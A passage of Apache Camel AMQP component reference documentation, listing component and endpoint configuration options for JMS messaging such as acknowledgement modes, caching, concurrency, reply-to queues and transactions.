and the JMS broker would have to attempt redeliveries, which yet again may be rejected, and eventually the message may be moved at a dead letter queue on the JMS broker. To avoid this its recommended to enable this option. | false | boolean\n| *allowReplyManagerQuick Stop* (consumer) | Whether the DefaultMessageListenerContainer used in the reply managers for request-reply messaging allow the DefaultMessageListenerContainer.runningAllowed flag to quick stop in case JmsConfigurationisAcceptMessagesWhileStopping is enabled, and org.apache.camel.CamelContext is currently being stopped. This quick stop ability is enabled by default in the regular JMS consumers but to enable for reply managers you must enable this flag. | false | boolean\n| *acknowledgementMode* (consumer) | The JMS acknowledgement mode defined as an Integer. Allows you to set vendor-specific extensions to the acknowledgment mode.For the regular modes, it is preferable to use the acknowledgementModeName instead. | | int\n| *eagerLoadingOf Properties* (consumer) | Enables eager loading of JMS properties as soon as a message is loaded which generally is inefficient as the JMS properties may not be required but sometimes can catch early any issues with the underlying JMS provider and the use of JMS properties | false | boolean\n| *acknowledgementModeName* (consumer) | The JMS acknowledgement name, which is one of: SESSION_TRANSACTED, CLIENT_ACKNOWLEDGE, AUTO_ACKNOWLEDGE, DUPS_OK_ACKNOWLEDGE | AUTO_ ACKNOWLEDGE | String\n| *autoStartup* (consumer) | Specifies whether the consumer container should auto-startup. | true | boolean\n| *cacheLevel* (consumer) | Sets the cache level by ID for the underlying JMS resources. See cacheLevelName option for more details. | | int\n| *cacheLevelName* (consumer) | Sets the cache level by name for the underlying JMS resources. Possible values are: CACHE_AUTO, CACHE_CONNECTION, CACHE_CONSUMER, CACHE_NONE, and CACHE_SESSION. The default setting is CACHE_AUTO. See the Spring documentation and Transactions Cache Levels for more information. | CACHE_AUTO | String\n| *replyToCacheLevelName* (producer) | Sets the cache level by name for the reply consumer when doing request\/reply over JMS. This option only applies when using fixed reply queues (not temporary). Camel will by default use: CACHE_CONSUMER for exclusive or shared w\/ replyToSelectorName. And CACHE_SESSION for shared without replyToSelectorName. Some JMS brokers such as IBM WebSphere may require to set the replyToCacheLevelName=CACHE_NONE to work. Note: If using temporary queues then CACHE_NONE is not allowed, and you must use a higher value such as CACHE_CONSUMER or CACHE_SESSION. | | String\n| *clientId* (common) | Sets the JMS client ID to use. Note that this value, if specified, must be unique and can only be used by a single JMS connection instance. It is typically only required for durable topic subscriptions. If using Apache ActiveMQ you may prefer to use Virtual Topics instead. | | String\n| *concurrentConsumers* (consumer) | Specifies the default number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | 1 | int\n| *replyToConcurrent Consumers* (producer) | Specifies the default number of concurrent consumers when doing request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | 1 | int\n| *connectionFactory* (common) | The connection factory to be use. A connection factory must be configured either on the component or endpoint. | | ConnectionFactory\n| *username* (security) | Username to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *password* (security) | Password to use with the ConnectionFactory. You can also configure username\/password directly on the ConnectionFactory. | | String\n| *deliveryPersistent* (producer) | Specifies whether persistent delivery is used by default. | true | boolean\n| *deliveryMode* (producer) | Specifies the delivery mode to be used. Possibles values are those defined by javax.jms.DeliveryMode. NON_PERSISTENT = 1 and PERSISTENT = 2. | | Integer\n| *durableSubscriptionName* (common) | The durable subscriber name for specifying durable topic subscriptions. The clientId option must be configured as well. | | String\n| *exceptionListener* (advanced) | Specifies the JMS Exception Listener that is to be notified of any underlying JMS exceptions. | | ExceptionListener\n| *errorHandler* (advanced) | Specifies a org.springframework.util.ErrorHandler to be invoked in case of any uncaught exceptions thrown while processing a Message. By default these exceptions will be logged at the WARN level, if no errorHandler has been configured. You can configure logging level and whether stack traces should be logged using errorHandlerLoggingLevel and errorHandlerLogStackTrace options. This makes it much easier to configure, than having to code a custom errorHandler. | | ErrorHandler\n| *errorHandlerLogging Level* (logging) | Allows to configure the default errorHandler logging level for logging uncaught exceptions. | WARN | LoggingLevel\n| *errorHandlerLogStack Trace* (logging) | Allows to control whether stacktraces should be logged or not, by the default errorHandler. | true | boolean\n| *explicitQosEnabled* (producer) | Set if the deliveryMode, priority or timeToLive qualities of service should be used when sending messages. This option is based on Spring's JmsTemplate. The deliveryMode, priority and timeToLive options are applied to the current endpoint. This contrasts with the preserveMessageQos option, which operates at message granularity, reading QoS properties exclusively from the Camel In message headers. | false | boolean\n| *exposeListenerSession* (consumer) | Specifies whether the listener session should be exposed when consuming messages. | false | boolean\n| *idleTaskExecutionLimit* (advanced) | Specifies the limit for idle executions of a receive task, not having received any message within its execution. If this limit is reached, the task will shut down and leave receiving to other executing tasks (in the case of dynamic scheduling; see the maxConcurrentConsumers setting). There is additional doc available from Spring. | 1 | int\n| *idleConsumerLimit* (advanced) | Specify the limit for the number of consumers that are allowed to be idle at any given time. | 1 | int\n| *maxConcurrentConsumers* (consumer) | Specifies the maximum number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToMaxConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | | int\n| *replyToMaxConcurrent Consumers* (producer) | Specifies the maximum number of concurrent consumers when using request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | | int\n| *replyOnTimeoutToMax ConcurrentConsumers* (producer) | Specifies the maximum number of concurrent consumers for continue routing when timeout occurred when using request\/reply over JMS. | 1 | int\n| *maxMessagesPerTask* (advanced) | The number of messages per task. -1 is unlimited. If you use a range for concurrent consumers (eg min max), then this option can be used to set a value to eg 100 to control how fast the consumers will shrink when less work is required. | -1 | int\n| *messageConverter* (advanced) | To use a custom Spring org.springframework.jms.support.converter.MessageConverter so you can be in control how to map to\/from a javax.jms.Message. | | MessageConverter\n| *mapJmsMessage* (advanced) | Specifies whether Camel should auto map the received JMS message to a suited payload type, such as javax.jms.TextMessage to a String etc. | true | boolean\n| *messageIdEnabled* (advanced) | When sending, specifies whether message IDs should be added. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the message ID set to null; if the provider ignores the hint, the message ID must be set to its normal unique value | true | boolean\n| *messageTimestampEnabled* (advanced) | Specifies whether timestamps should be enabled by default on sending messages. This is just an hint to the JMS broker.If the JMS provider accepts this hint, these messages must have the timestamp set to zero; if the provider ignores the hint the timestamp must be set to its normal value | true | boolean\n| *alwaysCopyMessage* (producer) | If true, Camel will always make a JMS message copy of the message when it is passed to the producer for sending. Copying the message is needed in some situations, such as when a replyToDestinationSelectorName is set (incidentally, Camel will set the alwaysCopyMessage option to true, if a replyToDestinationSelectorName is set) | false | boolean\n| *useMessageIDAs CorrelationID* (advanced) | Specifies whether JMSMessageID should always be used as JMSCorrelationID for InOut messages. | false | boolean\n| *priority* (producer) | Values greater than 1 specify the message priority when sending (where 0 is the lowest priority and 9 is the highest). The explicitQosEnabled option must also be enabled in order for this option to have any effect. | 4 | int\n| *pubSubNoLocal* (advanced) | Specifies whether to inhibit the delivery of messages published by its own connection. | false | boolean\n| *receiveTimeout* (advanced) | The timeout for receiving messages (in milliseconds). | 1000 | long\n| *recoveryInterval* (advanced) | Specifies the interval between recovery attempts, i.e. when a connection is being refreshed, in milliseconds. The default is 5000 ms, that is, 5 seconds. | 5000 | long\n| *taskExecutor* (consumer) | Allows you to specify a custom task executor for consuming messages. | | TaskExecutor\n| *timeToLive* (producer) | When sending messages, specifies the time-to-live of the message (in milliseconds). | -1 | long\n| *transacted* (transaction) | Specifies whether to use transacted mode | false | boolean\n| *lazyCreateTransaction Manager* (transaction) | If true, Camel will create a JmsTransactionManager, if there is no transactionManager injected when option transacted=true. | true | boolean\n| *transactionManager* (transaction) | The Spring transaction manager to use. | | PlatformTransaction Manager\n| *transactionName* (transaction) | The name of the transaction to use. | | String\n| *transactionTimeout* (transaction) | The timeout value of the transaction (in seconds), if using transacted mode. | -1 | int\n| *testConnectionOn Startup* (common) | Specifies whether to test the connection on startup. This ensures that when Camel starts that all the JMS consumers have a valid connection to the JMS broker. If a connection cannot be granted then Camel throws an exception on startup. This ensures that Camel is not started with failed connections. The JMS producers is tested as well. | false | boolean\n| *asyncStartListener* (advanced) | Whether to startup the JmsConsumer message listener asynchronously, when starting a route. For example if a JmsConsumer cannot get a connection to a remote JMS broker, then it may block while retrying and\/or failover. This will cause Camel to block while starting routes. By setting this option to true, you will let routes startup, while the JmsConsumer connects to the JMS broker using a dedicated thread in asynchronous mode. If this option is used, then beware that if the connection could not be established, then an exception is logged at WARN level, and the consumer will not be able to receive messages; You can then restart the route to retry. | false | boolean\n| *asyncStopListener* (advanced) | Whether to stop the JmsConsumer message listener asynchronously, when stopping a route. | false | boolean\n| *forceSendOriginal Message* (producer) | When using mapJmsMessage=false Camel will create a new JMS message to send to a new JMS destination if you touch the headers (get or set) during the route. Set this option to true to force Camel to send the original JMS message that was received. | false | boolean\n| *requestTimeout* (producer) | The timeout for waiting for a reply when using the InOut Exchange Pattern (in milliseconds). The default is 20 seconds. You can include the header CamelJmsRequestTimeout to override this endpoint configured timeout value, and thus have per message individual timeout values. See also the requestTimeoutCheckerInterval option. | 20000 | long\n| *requestTimeoutChecker Interval* (advanced) | Configures how often Camel should check for timed out Exchanges when doing request\/reply over JMS. By default Camel checks once per second. But if you must react faster when a timeout occurs, then you can lower this interval, to check more frequently. The timeout is determined by the option requestTimeout. | 1000 | long\n| *transferExchange* (advanced) | You can transfer the exchange over the wire instead of just the body and headers. The following fields are transferred: In body, Out body, Fault body, In headers, Out headers, Fault headers, exchange properties, exchange exception. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. You must enable this option on both the producer and consumer side, so Camel knows the payloads is an Exchange and not a regular payload. | false | boolean\n| *transferException* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed on the consumer side, then the caused Exception will be send back in response as a javax.jms.ObjectMessage. If the client is Camel, the returned Exception is rethrown. This allows you to use Camel JMS as a bridge in your routing - for example, using persistent queues to enable robust routing. Notice that if you also have transferExchange enabled, this option takes precedence. The caught exception is required to be serializable. The original Exception on the consumer side can be wrapped in an outer exception such as org.apache.camel.RuntimeCamelException when returned to the producer. | false | boolean\n| *transferFault* (advanced) | If enabled and you are using Request Reply messaging (InOut) and an Exchange failed with a SOAP fault (not exception) on the consumer side, then the fault flag on MessageisFault() will be send back in the response as a JMS header with the key org.apache.camel.component.jms.JmsConstantsJMS_TRANSFER_FAULTJMS_TRANSFER_FAULT. If the client is Camel, the returned fault flag will be set on the link org.apache.camel.MessagesetFault(boolean). You may want to enable this when using Camel components that support faults such as SOAP based such as cxf or spring-ws. | false | boolean\n| *jmsOperations* (advanced) | Allows you to use your own implementation of the org.springframework.jms.core.JmsOperations interface. Camel uses JmsTemplate as default. Can be used for testing purpose, but not used much as stated in the spring API docs. | | JmsOperations\n| *destinationResolver* (advanced) | A pluggable org.springframework.jms.support.destination.DestinationResolver that allows you to use your own resolver (for example, to lookup the real destination in a JNDI registry). | | DestinationResolver\n| *replyToType* (producer) | Allows for explicitly specifying which kind of strategy to use for replyTo queues when doing request\/reply over JMS. Possible values are: Temporary, Shared, or Exclusive. By default Camel will use temporary queues. However if replyTo has been configured, then Shared is used by default. This option allows you to use exclusive queues instead of shared ones. See Camel JMS documentation for more details, and especially the notes about the implications if running in a clustered environment, and the fact that Shared reply queues has lower performance than its alternatives Temporary and Exclusive. | | ReplyToType\n| *preserveMessageQos* (producer) | Set to true, if you want to send message using the QoS settings specified on the message, instead of the QoS settings on the JMS endpoint. The following three headers are considered JMSPriority, JMSDeliveryMode, and JMSExpiration. You can provide all or only some of them. If not provided, Camel will fall back to use the values from the endpoint instead. So, when using this option, the headers override the values from the endpoint. The explicitQosEnabled option, by contrast, will only use options set on the endpoint, and not values from the message header. | false | boolean\n| *asyncConsumer* (consumer) | Whether the JmsConsumer processes the Exchange asynchronously. If enabled then the JmsConsumer may pickup the next message from the JMS queue, while the previous message is being processed asynchronously (by the Asynchronous Routing Engine). This means that messages may be processed not 100% strictly in order. If disabled (as default) then the Exchange is fully processed before the JmsConsumer will pickup the next message from the JMS queue. Note if transacted has been enabled, then asyncConsumer=true does not run asynchronously, as transaction must be executed synchronously (Camel 3.0 may support async transactions). | false | boolean\n| *allowNullBody* (producer) | Whether to allow sending messages with no body. If this option is false and the message body is null, then an JMSException is thrown. | true | boolean\n| *includeSentJMS MessageID* (producer) | Only applicable when sending to JMS destination using InOnly (eg fire and forget). Enabling this option will enrich the Camel Exchange with the actual JMSMessageID that was used by the JMS client when the message was sent to the JMS destination. | false | boolean\n| *includeAllJMSX Properties* (advanced) | Whether to include all JMSXxxx properties when mapping from JMS to Camel Message. Setting this to true will include properties such as JMSXAppID, and JMSXUserID etc. Note: If you are using a custom headerFilterStrategy then this option does not apply. | false | boolean\n| *defaultTaskExecutor Type* (consumer) | Specifies what default TaskExecutor type to use in the DefaultMessageListenerContainer, for both consumer endpoints and the ReplyTo consumer of producer endpoints. Possible values: SimpleAsync (uses Spring's SimpleAsyncTaskExecutor) or ThreadPool (uses Spring's ThreadPoolTaskExecutor with optimal values - cached threadpool-like). If not set, it defaults to the previous behaviour, which uses a cached thread pool for consumer endpoints and SimpleAsync for reply consumers. The use of ThreadPool is recommended to reduce thread trash in elastic configurations with dynamically increasing and decreasing concurrent consumers. | | DefaultTaskExecutor Type\n| *jmsKeyFormatStrategy* (advanced) | Pluggable strategy for encoding and decoding JMS keys so they can be compliant with the JMS specification. Camel provides two implementations out of the box: default and passthrough. The default strategy will safely marshal dots and hyphens (. and -). The passthrough strategy leaves the key as is. Can be used for JMS brokers which do not care whether JMS header keys contain illegal characters. You can provide your own implementation of the org.apache.camel.component.jms.JmsKeyFormatStrategy and refer to it using the notation. | | JmsKeyFormatStrategy\n| *allowAdditionalHeaders* (producer) | This option is used to allow additional headers which may have values that are invalid according to JMS specification. For example some message systems such as WMQ do this with header names using prefix JMS_IBM_MQMD_ containing values with byte array or other invalid types. You can specify multiple header names separated by comma, and use as suffix for wildcard matching. | | String\n| *queueBrowseStrategy* (advanced) | To use a custom QueueBrowseStrategy when browsing queues | | QueueBrowseStrategy\n| *messageCreatedStrategy* (advanced) | To use the given MessageCreatedStrategy which are invoked when Camel creates new instances of javax.jms.Message objects when Camel is sending a JMS message. | | MessageCreatedStrategy\n| *waitForProvision CorrelationToBeUpdated Counter* (advanced) | Number of times to wait for provisional correlation id to be updated to the actual correlation id when doing request\/reply over JMS and when the option useMessageIDAsCorrelationID is enabled. | 50 | int\n| *waitForProvision CorrelationToBeUpdated ThreadSleepingTime* (advanced) | Interval in millis to sleep each time while waiting for provisional correlation id to be updated. | 100 | long\n| *correlationProperty* (producer) | Use this JMS property to correlate messages in InOut exchange pattern (request-reply) instead of JMSCorrelationID property. This allows you to exchange messages with systems that do not correlate messages using JMSCorrelationID JMS property. If used JMSCorrelationID will not be used or set by Camel. The value of here named property will be generated if not supplied in the header of the message under the same name. | | String\n| *subscriptionDurable* (consumer) | Set whether to make the subscription durable. The durable subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a durable subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. | false | boolean\n| *subscriptionShared* (consumer) | Set whether to make the subscription shared. The shared subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a shared subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Note that shared subscriptions may also be durable, so this flag can (and often will) be combined with subscriptionDurable as well. Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. Requires a JMS 2.0 compatible message broker. | false | boolean\n| *subscriptionName* (consumer) | Set the name of a subscription to create. To be applied in case of a topic (pub-sub domain) with a shared or durable subscription. The subscription name needs to be unique within this client's JMS client id. Default is the class name of the specified message listener. Note: Only 1 concurrent consumer (which is the default of this message listener container) is allowed for each subscription, except for a shared subscription (which requires JMS 2.0). | | String\n| *streamMessageType Enabled* (producer) | Sets whether StreamMessage type is enabled or not. Message payloads of streaming kind such as files, InputStream, etc will either by sent as BytesMessage or StreamMessage. This option controls which kind will be used. By default BytesMessage is used which enforces the entire message payload to be read into memory. By enabling this option the message payload is read into memory in chunks and each chunk is then written to the StreamMessage until no more data. | false | boolean\n| *headerFilterStrategy* (filter) | To use a custom org.apache.camel.spi.HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\n\n\n\/\/ endpoint options: START\nThe AMQP endpoint is configured using URI syntax:\n\n----\namqp:destinationType:destinationName\n----\n\nwith the following path and query parameters:\n\n==== Path Parameters (2 parameters):\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *destinationType* | The kind of destination to use | queue | String\n| *destinationName* | *Required* Name of the queue or topic to use as destination | | String\n|===\n\n==== Query Parameters (90 parameters):\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *clientId* (common) | Sets the JMS client ID to use. Note that this value, if specified, must be unique and can only be used by a single JMS connection instance. It is typically only required for durable topic subscriptions. If using Apache ActiveMQ you may prefer to use Virtual Topics instead. | | String\n| *connectionFactory* (common) | The connection factory to be use. A connection factory must be configured either on the component or endpoint. | | ConnectionFactory\n| *disableReplyTo* (common) | Specifies whether Camel ignores the JMSReplyTo header in messages. If true, Camel does not send a reply back to the destination specified in the JMSReplyTo header. You can use this option if you want Camel to consume from a route and you do not want Camel to automatically send back a reply message because another component in your code handles the reply message. You can also use this option if you want to use Camel as a proxy between different message brokers and you want to route message from one system to another. | false | boolean\n| *durableSubscriptionName* (common) | The durable subscriber name for specifying durable topic subscriptions. The clientId option must be configured as well. | | String\n| *jmsMessageType* (common) | Allows you to force the use of a specific javax.jms.Message implementation for sending JMS messages. Possible values are: Bytes, Map, Object, Stream, Text. By default, Camel would determine which JMS message type to use from the In body type. This option allows you to specify it. | | JmsMessageType\n| *testConnectionOnStartup* (common) | Specifies whether to test the connection on startup. This ensures that when Camel starts that all the JMS consumers have a valid connection to the JMS broker. If a connection cannot be granted then Camel throws an exception on startup. This ensures that Camel is not started with failed connections. The JMS producers is tested as well. | false | boolean\n| *acknowledgementModeName* (consumer) | The JMS acknowledgement name, which is one of: SESSION_TRANSACTED, CLIENT_ACKNOWLEDGE, AUTO_ACKNOWLEDGE, DUPS_OK_ACKNOWLEDGE | AUTO_ ACKNOWLEDGE | String\n| *asyncConsumer* (consumer) | Whether the JmsConsumer processes the Exchange asynchronously. If enabled then the JmsConsumer may pickup the next message from the JMS queue, while the previous message is being processed asynchronously (by the Asynchronous Routing Engine). This means that messages may be processed not 100% strictly in order. If disabled (as default) then the Exchange is fully processed before the JmsConsumer will pickup the next message from the JMS queue. Note if transacted has been enabled, then asyncConsumer=true does not run asynchronously, as transaction must be executed synchronously (Camel 3.0 may support async transactions). | false | boolean\n| *autoStartup* (consumer) | Specifies whether the consumer container should auto-startup. | true | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *cacheLevel* (consumer) | Sets the cache level by ID for the underlying JMS resources. See cacheLevelName option for more details. | | int\n| *cacheLevelName* (consumer) | Sets the cache level by name for the underlying JMS resources. Possible values are: CACHE_AUTO, CACHE_CONNECTION, CACHE_CONSUMER, CACHE_NONE, and CACHE_SESSION. The default setting is CACHE_AUTO. See the Spring documentation and Transactions Cache Levels for more information. | CACHE_AUTO | String\n| *concurrentConsumers* (consumer) | Specifies the default number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | 1 | int\n| *maxConcurrentConsumers* (consumer) | Specifies the maximum number of concurrent consumers when consuming from JMS (not for request\/reply over JMS). See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. When doing request\/reply over JMS then the option replyToMaxConcurrentConsumers is used to control number of concurrent consumers on the reply message listener. | | int\n| *replyTo* (consumer) | Provides an explicit ReplyTo destination, which overrides any incoming value of Message.getJMSReplyTo(). | | String\n| *replyToDeliveryPersistent* (consumer) | Specifies whether to use persistent delivery by default for replies. | true | boolean\n| *selector* (consumer) | Sets the JMS selector to use | | String\n| *subscriptionDurable* (consumer) | Set whether to make the subscription durable. The durable subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a durable subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. | false | boolean\n| *subscriptionName* (consumer) | Set the name of a subscription to create. To be applied in case of a topic (pub-sub domain) with a shared or durable subscription. The subscription name needs to be unique within this client's JMS client id. Default is the class name of the specified message listener. Note: Only 1 concurrent consumer (which is the default of this message listener container) is allowed for each subscription, except for a shared subscription (which requires JMS 2.0). | | String\n| *subscriptionShared* (consumer) | Set whether to make the subscription shared. The shared subscription name to be used can be specified through the subscriptionName property. Default is false. Set this to true to register a shared subscription, typically in combination with a subscriptionName value (unless your message listener class name is good enough as subscription name). Note that shared subscriptions may also be durable, so this flag can (and often will) be combined with subscriptionDurable as well. Only makes sense when listening to a topic (pub-sub domain), therefore this method switches the pubSubDomain flag as well. Requires a JMS 2.0 compatible message broker. | false | boolean\n| *acceptMessagesWhileStopping* (consumer) | Specifies whether the consumer accept messages while it is stopping. You may consider enabling this option, if you start and stop JMS routes at runtime, while there are still messages enqueued on the queue. If this option is false, and you stop the JMS route, then messages may be rejected, and the JMS broker would have to attempt redeliveries, which yet again may be rejected, and eventually the message may be moved at a dead letter queue on the JMS broker. To avoid this its recommended to enable this option. | false | boolean\n| *allowReplyManagerQuickStop* (consumer) | Whether the DefaultMessageListenerContainer used in the reply managers for request-reply messaging allow the DefaultMessageListenerContainer.runningAllowed flag to quick stop in case JmsConfigurationisAcceptMessagesWhileStopping is enabled, and org.apache.camel.CamelContext is currently being stopped. This quick stop ability is enabled by default in the regular JMS consumers but to enable for reply managers you must enable this flag. | false | boolean\n| *consumerType* (consumer) | The consumer type to use, which can be one of: Simple, Default, or Custom. The consumer type determines which Spring JMS listener to use. Default will use org.springframework.jms.listener.DefaultMessageListenerContainer, Simple will use org.springframework.jms.listener.SimpleMessageListenerContainer. When Custom is specified, the MessageListenerContainerFactory defined by the messageListenerContainerFactory option will determine what org.springframework.jms.listener.AbstractMessageListenerContainer to use. | Default | ConsumerType\n| *defaultTaskExecutorType* (consumer) | Specifies what default TaskExecutor type to use in the DefaultMessageListenerContainer, for both consumer endpoints and the ReplyTo consumer of producer endpoints. Possible values: SimpleAsync (uses Spring's SimpleAsyncTaskExecutor) or ThreadPool (uses Spring's ThreadPoolTaskExecutor with optimal values - cached threadpool-like). If not set, it defaults to the previous behaviour, which uses a cached thread pool for consumer endpoints and SimpleAsync for reply consumers. The use of ThreadPool is recommended to reduce thread trash in elastic configurations with dynamically increasing and decreasing concurrent consumers. | | DefaultTaskExecutor Type\n| *eagerLoadingOfProperties* (consumer) | Enables eager loading of JMS properties and payload as soon as a message is loaded which generally is inefficient as the JMS properties may not be required but sometimes can catch early any issues with the underlying JMS provider and the use of JMS properties | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this options is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *exposeListenerSession* (consumer) | Specifies whether the listener session should be exposed when consuming messages. | false | boolean\n| *replyToSameDestination Allowed* (consumer) | Whether a JMS consumer is allowed to send a reply message to the same destination that the consumer is using to consume from. This prevents an endless loop by consuming and sending back the same message to itself. | false | boolean\n| *taskExecutor* (consumer) | Allows you to specify a custom task executor for consuming messages. | | TaskExecutor\n| *deliveryMode* (producer) | Specifies the delivery mode to be used. Possibles values are those defined by javax.jms.DeliveryMode. NON_PERSISTENT = 1 and PERSISTENT = 2. | | Integer\n| *deliveryPersistent* (producer) | Specifies whether persistent delivery is used by default. | true | boolean\n| *explicitQosEnabled* (producer) | Set if the deliveryMode, priority or timeToLive qualities of service should be used when sending messages. This option is based on Spring's JmsTemplate. The deliveryMode, priority and timeToLive options are applied to the current endpoint. This contrasts with the preserveMessageQos option, which operates at message granularity, reading QoS properties exclusively from the Camel In message headers. | false | Boolean\n| *preserveMessageQos* (producer) | Set to true, if you want to send message using the QoS settings specified on the message, instead of the QoS settings on the JMS endpoint. The following three headers are considered JMSPriority, JMSDeliveryMode, and JMSExpiration. You can provide all or only some of them. If not provided, Camel will fall back to use the values from the endpoint instead. So, when using this option, the headers override the values from the endpoint. The explicitQosEnabled option, by contrast, will only use options set on the endpoint, and not values from the message header. | false | boolean\n| *priority* (producer) | Values greater than 1 specify the message priority when sending (where 0 is the lowest priority and 9 is the highest). The explicitQosEnabled option must also be enabled in order for this option to have any effect. | 4 | int\n| *replyToConcurrentConsumers* (producer) | Specifies the default number of concurrent consumers when doing request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | 1 | int\n| *replyToMaxConcurrent Consumers* (producer) | Specifies the maximum number of concurrent consumers when using request\/reply over JMS. See also the maxMessagesPerTask option to control dynamic scaling up\/down of threads. | | int\n| *replyToOnTimeoutMax ConcurrentConsumers* (producer) | Specifies the maximum number of concurrent consumers for continue routing when timeout occurred when using request\/reply over JMS. | 1 | int\n| *replyToOverride* (producer) | Provides an explicit ReplyTo destination in the JMS message, which overrides the setting of replyTo. It is useful if you want to forward the message to a remote Queue and receive the reply message from the ReplyTo destination. | | String\n| *replyToType* (producer) | Allows for explicitly specifying which kind of strategy to use for replyTo queues when doing request\/reply over JMS. Possible values are: Temporary, Shared, or Exclusive. By default Camel will use temporary queues. However if replyTo has been configured, then Shared is used by default. This option allows you to use exclusive queues instead of shared ones. See Camel JMS documentation for more details, and especially the notes about the implications if running in a clustered environment, and the fact that Shared reply queues has lower performance than its alternatives Temporary and Exclusive. | | ReplyToType\n| *requestTimeout* (producer) | The timeout for waiting for a reply when using the InOut Exchange Pattern (in milliseconds). The default is 20 seconds. You can include the header CamelJmsRequestTimeout to override this endpoint configured timeout value, and thus have per message individual timeout values. See also the requestTimeoutCheckerInterval option. | 20000 | long\n| *timeToLive* (producer) | When sending messages, specifies the time-to-live of the message (in milliseconds). | -1 | long\n| *allowAdditionalHeaders* (producer) | This option is used to allow additional headers which may have values that are invalid according to JMS specification. For example some message systems such as WMQ do this with header names using prefix JMS_IBM_MQMD_ containing values with byte array or other invalid types. You can specify multiple header names separated by comma, and use as suffix for wildcard matching. | | String\n| *allowNullBody* (producer) | Whether to allow sending messages with no body. If this option is false and the message body is null, then an JMSException is thrown. | true | boolean\n| *alwaysCopyMessage* (producer) | If true, Camel will always make a JMS message copy of the message when it is passed to the producer for sending. Copying the message is needed in some situations, such as when a replyToDestinationSelectorName is set (incidentally, Camel will set the alwaysCopyMessage option to true, if a replyToDestinationSelectorName is set) | false | boolean\n| *correlationProperty* (producer) | When using InOut exchange pattern use this JMS property instead of JMSCorrelationID JMS property to correlate messages. If set messages will be correlated solely on the value of this property JMSCorrelationID property will be ignored and not set by Camel. | | String\n| *disableTimeToLive* (producer) | Use this option to force disabling time to live. For example when you do request\/reply over JMS, then Camel will by default use the requestTimeout value as time to live on the message being sent. The problem is that the sender and receiver systems have to have their clocks synchronized, so they are in sync. This is not always so easy to archive. So you can use disableTimeToLive=true to not set a time to live value on the sent message. Then the message will not expire on the receiver system. See below in section About time to live for more details. | false | boolean\n| *forceSendOriginalMessage* (producer) | When using mapJmsMessage=false Camel will create a new JMS message to send to a new JMS destination if you touch the headers (get or set) during the route. Set this option to true to force Camel to send the original JMS message that was received. | false | boolean\n| *includeSentJMSMessageID* (producer) | Only applicable when sending to JMS destination using InOnly (eg fire and forget). Enabling this option will enrich the Camel Exchange with the actual JMSMessageID that was used by the JMS client when the message was sent to the JMS destination. | false | boolean\n| *replyToCacheLevelName* (producer) | Sets the cache level by name for the reply consumer when doing request\/reply over JMS. This option only applies when using fixed reply queues (not temporary). Camel will by default use: CACHE_CONSUMER for exclusive or shared w\/ replyToSelectorName. And CACHE_SESSION for shared without replyToSelectorName. Some JMS brokers such as IBM WebSphere may require to set the replyToCacheLevelName=CACHE_NONE to work. Note: If using temporary queues then CACHE_NONE is not allowed, and you must use a higher value such as CACHE_CONSUMER or CACHE_SESSION. | | String\n| *replyToDestinationSelector Name* (producer) | Sets the JMS Selector using the fixed name to be used so you can filter out your own replies from the others when using a shared queue (that is, if you are not using a temporary reply queue). | | String\n| *streamMessageTypeEnabled* (producer) | Sets whether StreamMessage type is enabled or not. Message payloads of streaming kind such as files, InputStream, etc will either by sent as BytesMessage or StreamMessage. This option controls which kind will be used. By default BytesMessage is used which enforces the entire message payload to be read into memory. By enabling this option the message payload is read into memory in chunks and each chunk is then written to the StreamMessage until no more data. | false | boolean\n| *allowSerializedHeaders* (advanced) | Controls whether or not to include serialized headers. Applies only when transferExchange is true. This requires that the objects are serializable. Camel will exclude any non-serializable objects and log it at WARN level. | false | boolean\n| *asyncStartListener* (advanced) | Whether to startup the JmsConsumer message listener 